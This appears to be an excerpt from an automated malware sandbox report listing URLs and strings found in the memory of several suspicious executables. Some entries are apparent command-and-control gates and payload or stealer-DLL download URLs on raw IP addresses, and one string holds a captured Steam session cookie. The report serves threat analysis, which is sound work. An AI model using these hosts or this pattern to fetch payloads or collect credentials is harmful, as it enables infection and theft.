                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=6afe7c878a89df278c1d291d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 31 Dec 2024 14:47:13 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                                    Source: powershell.exe, 00000035.00000002.2538930366.000001732A49C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1742250638.000000000192C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                                    Source: powershell.exe, 00000035.00000002.2497324183.00000173277A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe$
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1741566665.000000000192B000.00000004.00000020.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1742250638.000000000192C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exeJ
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1741566665.000000000192B000.00000004.00000020.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1742250638.000000000192C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000F74000.00000040.00000001.01000000.00000006.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000001057000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll%
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dlla
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllm
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dlls
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/F
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/O
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E44000.00000004.00000020.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000F74000.00000040.00000001.01000000.00000006.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB2D000.00000004.00000020.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000001057000.00000040.00000001.01000000.00000006.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php3
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpAZ
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpJ
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000F74000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpg
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000001057000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpox
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000F74000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpser
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000F74000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206Local
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000F74000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206LocalMicrosoft
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000001057000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206c4becf79229cb002.phpcbbbb703d91fb637c662a9d77f85release
                                    Source: skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196394890.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                                    Source: skotes.exe, 00000012.00000003.6196394890.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php#
                                    Source: skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7
                                    Source: skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded%
                                    Source: skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedS
                                    Source: skotes.exe, 00000012.00000003.2747659202.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/fate/random.exe
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2575434989.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                    Source: powershell.exe, 00000025.00000002.2363909554.00000000088A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microl
                                    Source: powershell.exe, 00000035.00000002.2495364634.0000017327714000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft2
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2575434989.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                    Source: skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2575434989.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000003067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000003067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2822393394.000000000075F000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2807665436.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                                    Source: powershell.exe, 0000001F.00000002.2281404457.0000000005B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2329195901.00000000061B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2725963665.00000173398E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2725963665.0000017339A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2538930366.000001732B202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2575434989.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                                    Source: powershell.exe, 00000035.00000002.2538930366.0000017329A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.00000000030AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.00000000030AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
                                    Source: powershell.exe, 0000001F.00000002.2276089201.0000000004C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.00000000052A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2276089201.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2538930366.0000017329871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 0000001F.00000002.2276089201.0000000004C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.00000000052A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                                    Source: powershell.exe, 00000035.00000002.2538930366.0000017329A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                    Source: jyidkjkfhjawd.exe, 00000041.00000002.2848173561.00000000008D3000.00000040.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                                    Source: jyidkjkfhjawd.exe, 00000041.00000002.2848173561.00000000008D3000.00000040.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
